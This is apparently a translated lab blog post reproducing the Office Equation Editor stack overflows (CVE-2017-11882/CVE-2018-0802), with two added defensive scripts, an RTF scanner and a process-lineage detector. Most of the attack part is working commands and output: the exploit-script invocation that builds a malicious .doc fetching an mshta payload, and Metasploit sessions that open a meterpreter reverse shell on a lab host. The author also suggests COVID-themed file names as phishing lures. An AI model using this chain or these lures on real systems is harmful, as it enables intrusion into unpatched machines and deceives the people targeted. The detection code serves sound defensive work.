How the vulnerability works
Both vulnerabilities are essentially stack overflows in the Equation Editor (EQNEDT32.EXE) that Office installs by default (don't ask what a stack overflow is, I can't explain it either /(ㄒoㄒ)/~~)
Affected versions
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
Reproduction environment
1. OS version: Win7 Ultimate SP1 (virtual machine), firewall on, no antivirus installed
2. Office version: Professional Plus 2013 64-bit
3. Python 2.7: needed to run the script
Reproduction steps
1. Related settings
Open Word and go to the menu Insert - Object. Check whether the "Create New" list contains the option below; if it doesn't, reproduction won't work
At first, for convenience, I downloaded a portable version of Office 2010 from the web. It didn't have this option, reproduction failed, and opening the malicious Word file gave this error:
There is no need to enable macros. As said above, this vulnerability comes from the Equation Editor and has nothing to do with macros; I did not enable macros:
2. Check whether the vulnerability exists
Download the script: https://github.com/Ridter/RTF_11882_0802/
Run the following command:
python RTF_11882_0802.py -c "cmd.exe /c calc.exe" -o calc.doc
Double-click calc.doc; if Calculator pops up, the vulnerability exists:
3. Exploitation
I searched msf and there is a ready-made exploit
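Opening the document is one way to check; a defender usually wants the document-side check too. The following Python 3 script is an added example, not part of the original post and not part of the RTF_11882_0802 script: it triages an RTF file for the Equation Editor OLE object that the public exploits embed, without opening it in Word. The identifiers it keys on are Equation Editor's own, not values taken from this page: the ProgID "Equation.3" and the CLSID {0002CE02-0000-0000-C000-000000000046}, which appear in the \objclass control word and inside the hex-encoded \objdata stream respectively. The two RTF samples in the block are constructed for the demonstration and contain no exploit content.

```python
"""Static triage of RTF files for embedded Equation Editor (EQNEDT32) objects.

Heuristic: exploit documents for CVE-2017-11882 / CVE-2018-0802 carry an OLE
object whose class is "Equation.3" (Equation Editor's ProgID); the object's
CLSID is {0002CE02-0000-0000-C000-000000000046}. Both can be spotted in the
file bytes without executing anything. Assumption: input is RTF, not OOXML.
"""
import re
import uuid

EQUATION_PROGID = "Equation.3"
EQUATION_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")
# bytes_le is the byte order a GUID has inside an OLE/CFB structure
EQUATION_CLSID_LE = EQUATION_CLSID.bytes_le

OBJCLASS_RE = re.compile(rb"\\objclass\s*([A-Za-z0-9._]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def decode_objdata(hexblob: bytes) -> bytes:
    """\\objdata payloads are hex text, possibly broken up by whitespace."""
    clean = re.sub(rb"\s+", b"", hexblob)
    if len(clean) % 2:
        clean = clean[:-1]  # tolerate a truncated trailing nibble
    try:
        return bytes.fromhex(clean.decode("ascii"))
    except ValueError:
        return b""


def scan_rtf(data: bytes) -> list:
    """Return human-readable findings; an empty list means no Equation object seen."""
    findings = []
    for m in OBJCLASS_RE.finditer(data):
        if m.group(1).decode("ascii", "replace").lower() == EQUATION_PROGID.lower():
            findings.append("objclass Equation.3")
    for m in OBJDATA_RE.finditer(data):
        blob = decode_objdata(m.group(1))
        if EQUATION_CLSID_LE in blob:
            findings.append("Equation Editor CLSID in objdata")
        if EQUATION_PROGID.encode() in blob:
            findings.append("Equation.3 string in objdata")
    # \objupdate forces the object to load on open; only interesting with an Equation object
    if b"\\objupdate" in data and findings:
        findings.append("object auto-update flag set")
    return findings


def constructed_sample(with_equation: bool) -> bytes:
    """Constructed RTF fragments (not real exploit files) for testing the scanner."""
    if with_equation:
        objclass = b"Equation.3"
        # constructed OLE blob: a header-like prefix, the ProgID, then the CLSID bytes
        payload = b"\x01\x05\x00\x00\x02\x00\x00\x00" + objclass + b"\x00" + EQUATION_CLSID_LE
        flags = b"\\objupdate"
    else:
        objclass = b"Word.Document.8"
        payload = b"\x01\x05\x00\x00\x02\x00\x00\x00" + objclass + b"\x00" + b"\x00" * 16
        flags = b""
    return (b"{\\rtf1{\\object\\objemb" + flags + b"{\\*\\objclass " + objclass +
            b"}{\\*\\objdata " + payload.hex().encode() + b"}}}")


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(scan_rtf(fh.read()))
    else:
        print("equation sample:", scan_rtf(constructed_sample(True)))
        print("benign sample:  ", scan_rtf(constructed_sample(False)))
```

Run it with a file path to triage a real document, or with no arguments to see it flag the constructed Equation sample and clear the benign one. A .doc produced by the script above is RTF despite its extension, which is why the scanner keys on RTF control words rather than the file name.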

msf5 > use exploit/windows/fileformat/office_ms17_11882
msf5 exploit(windows/fileformat/office_ms17_11882) > show options

Module options (exploit/windows/fileformat/office_ms17_11882):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILENAME     msf.rtf          yes       Filename to save as, or inject
   FOLDER_PATH                   no        Path to file to inject
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080             yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

**DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office

msf5 exploit(windows/fileformat/office_ms17_11882) > set FILENAME test.doc
FILENAME => test.doc
msf5 exploit(windows/fileformat/office_ms17_11882) > set LHOST 192.168.119.129
LHOST => 192.168.119.129
msf5 exploit(windows/fileformat/office_ms17_11882) > exploit

Unfortunately the shell never came back...
Found another exploit online (reference: https://myzxcg.github.io/20180921.html):

msf5 exploit(windows/fileformat/office_ms17_11882) > use exploits/windows/smb/PS_shell
msf5 exploit(windows/smb/PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/PS_shell) > show options

Module options (exploit/windows/smb/PS_shell):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/smb/PS_shell) > set LHOST 192.168.119.129
LHOST => 192.168.119.129
msf5 exploit(windows/smb/PS_shell) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/smb/PS_shell) > set URIPATH 235
URIPATH => 235
msf5 exploit(windows/smb/PS_shell) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.119.129:4445
[*] Using URL: http://0.0.0.0:8080/235
[*] Local IP: http://192.168.119.129:8080/235
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.119.129:8080/235"
msf5 exploit(windows/smb/PS_shell) > [*] 192.168.119.136    PS_shell - Delivering payload
[*] Sending stage (180291 bytes) to 192.168.119.136
[*] Meterpreter session 1 opened (192.168.119.129:4445 -> 192.168.119.136:49402) at 2020-06-18 05:04:19 -0400

Generate the malicious file:
python RTF_11882_0802.py -c "mshta http://192.168.119.129:8080/235" -o new.doc
Once new.doc is opened it looks like an ordinary Word document; nothing seems unusual:
But after it is opened, Kali successfully receives the reverse shell, with the privileges of the currently logged-in user (it seems personal Windows logins are basically all admin O(∩_∩)O). Even after new.doc has been opened and then closed again, the session is still usable. Does the session survive a shutdown? You wish, hahaha
No idea why the whoami command won't run...
The key step of this remote code execution vulnerability is getting the malicious Word file opened on the target machine, so in practice it is mostly used in phishing: pick a file name people feel like opening, such as the previously reported "COVID-19 infection diagnosis" or "Wuhan travel information collection form". If your system happens to have Office installed and hasn't been patched promptly, congratulations~
But phishing has one fatal flaw: as long as you don't click, there is nothing I can do, hahaha~
Further study
The reproduction above was done without any antivirus installed. Next, install a certain "XX Duba" antivirus on the Win7 VM and open new.doc again; it gets detected
After clicking "Block and close" in the screenshot above and then opening Word, Kali can no longer receive the reverse shell. So, remember to install antivirus (I'd think even the worst antivirus protects against known vulnerabilities); don't run naked~
This article is for technical study and exchange only. Use for illegal purposes is strictly forbidden; anyone who does so bears all consequences themselves.
If you repost, please credit the source; that is respect for other people's work.
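Antivirus caught the file in this run, but the behaviour the walkthrough describes is also easy to catch from endpoint telemetry: Word starts EQNEDT32.EXE out-of-process to render the equation object, and the Equation Editor has no legitimate reason to start child processes, so a child of EQNEDT32.EXE (cmd.exe /c calc.exe and mshta in this post) is the durable signal. It also explains why the session survived closing new.doc: the spawned process is a child of the Equation Editor, not of Word. The Python 3 detector below is an added example, not part of the original post; the Sysmon-style process-creation events it parses are constructed JSON lines, not real telemetry, and the field names and file paths are assumptions.

```python
"""Process-lineage detection for Equation Editor abuse (CVE-2017-11882 / CVE-2018-0802).

Input: process-creation events as JSON lines with ParentImage, Image and
CommandLine fields (Sysmon Event ID 1 style; field names are an assumption).
Rules, highest severity first:
  high   - any child of EQNEDT32.EXE (the Equation Editor never spawns processes)
  medium - an Office application spawning a script host / LOLBin
  info   - Office loading the Equation Editor for an embedded object
"""
import json
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
LOLBINS = {"cmd.exe", "mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def basename(path):
    """Windows-style basename, lower-cased, works on any host OS."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return an alert dict for a suspicious event, or None for a benign one."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent == EQUATION_EDITOR:
        return {"severity": "high", "rule": "EQNEDT32.EXE spawned a child process",
                "child": image, "cmdline": cmd}
    if parent in OFFICE_APPS and image in LOLBINS:
        return {"severity": "medium", "rule": "Office application spawned a script host",
                "child": image, "cmdline": cmd}
    if parent in OFFICE_APPS and image == EQUATION_EDITOR:
        return {"severity": "info", "rule": "Equation Editor loaded for an embedded object",
                "child": image, "cmdline": cmd}
    return None


def detect(jsonl_text):
    """Run classify() over every well-formed JSON line; malformed lines are skipped."""
    alerts = []
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # do not let one bad record stop the detector
        alert = classify(event)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed events modelled on the walkthrough above; not real telemetry.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n new.doc'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r'"EQNEDT32.EXE" -Embedding'},
    {"ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c calc.exe"},
    {"ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://192.168.119.129:8080/235"},
])

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['rule']}: {alert['child']} <- {alert['cmdline']}")
```

Against the sample the detector raises one info alert for Word loading the Equation Editor and two high alerts for the cmd.exe and mshta children; the Explorer-to-Word launch produces nothing. The "high" rule needs no command-line pattern at all, which is what makes it robust to whatever payload the document carries.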